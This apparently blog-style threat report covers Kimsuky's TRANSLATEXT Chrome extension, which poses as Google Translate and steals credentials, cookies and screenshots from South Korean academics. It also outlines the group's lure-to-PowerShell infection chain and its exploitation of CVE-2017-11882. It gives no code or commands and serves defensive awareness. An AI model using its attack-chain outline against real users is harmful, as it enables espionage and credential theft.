Introduction
The cyber threat landscape has seen a new development with the emergence of a malicious Google Chrome extension, TRANSLATEXT, linked to the North Korean hacking group Kimsuky. This extension is part of an ongoing intelligence collection effort aimed at stealing sensitive information from targeted individuals. The extension, identified by Zscaler ThreatLabz in early March 2024, has raised concerns due to its sophisticated design and specific targeting of South Korean academia, particularly those focusing on North Korean political affairs.
Kimsuky: A Notorious Threat Actor
Kimsuky, a well-known North Korean hacking group, has been active since at least 2012. The group is notorious for its cyber espionage and financially motivated attacks targeting South Korean entities. It is considered a sister group to the Lazarus cluster and is part of the Reconnaissance General Bureau (RGB). Kimsuky is also tracked under various names, including APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, Springtail, and Velvet Chollima.
The Emergence of TRANSLATEXT
TRANSLATEXT, the newly discovered malicious Chrome extension, is designed to steal a range of sensitive information, including email addresses, usernames, passwords, cookies, and browser screenshots. Zscaler ThreatLabz highlighted its ability to gather intelligence from targeted individuals. The extension masquerades as Google Translate and incorporates JavaScript code to bypass security measures for services like Google, Kakao, and Naver.
Campaign Targeting and Attack Methodology
The targeted campaign directed against South Korean academia is a continuation of Kimsuky's long-standing interest in gathering intelligence on North Korean political affairs. The exact mode of initial access for the newly discovered activity remains unclear, although Kimsuky is known to use spear-phishing and social engineering attacks to initiate the infection chain.
The attack typically begins with a ZIP archive purportedly about Korean military history, containing a Hangul Word Processor document and an executable file. Launching the executable retrieves a PowerShell script from an attacker-controlled server, exporting information about the compromised victim to a GitHub repository and downloading additional PowerShell code via a Windows shortcut (LNK) file.
Recent Activities and Exploits
In recent weeks, Kimsuky has weaponized a known security flaw in Microsoft Office (CVE-2017-11882) to distribute a keylogger and used job-themed lures in attacks aimed at the aerospace and defense sectors. These attacks aim to drop an espionage tool with data gathering and secondary payload execution functionalities.
According to cybersecurity company CyberArmor, Kimsuky has employed a backdoor, previously undocumented, allowing attackers to perform basic reconnaissance and drop additional payloads for remote control of compromised machines. CyberArmor has named this campaign Niki.
TRANSLATEXT Extension: Technical Details
Zscaler discovered the GitHub account hosting the TRANSLATEXT extension under the name "GoogleTranslate.crx," created on February 13, 2024. The files were briefly present in the repository on March 7, 2024, and deleted the next day, indicating that Kimsuky intended to minimize exposure and use the malware for a short period to target specific individuals.
The TRANSLATEXT extension incorporates functionalities to siphon email addresses, credentials, cookies, and capture browser screenshots. It fetches commands from a Blogger Blogspot URL to take screenshots of newly opened tabs and delete all cookies from the browser, among other actions.
Conclusion
The emergence of the TRANSLATEXT extension underscores the persistent threat posed by Kimsuky. The group's sophisticated attack methods and targeted campaigns highlight the need for heightened cybersecurity measures, particularly for entities involved in sensitive political affairs. By understanding the tactics and tools employed by threat actors like Kimsuky, organizations can better prepare and defend against such cyber threats. The ongoing vigilance and collaboration among cybersecurity professionals are essential to mitigate the risks posed by these malicious activities.
0 Comments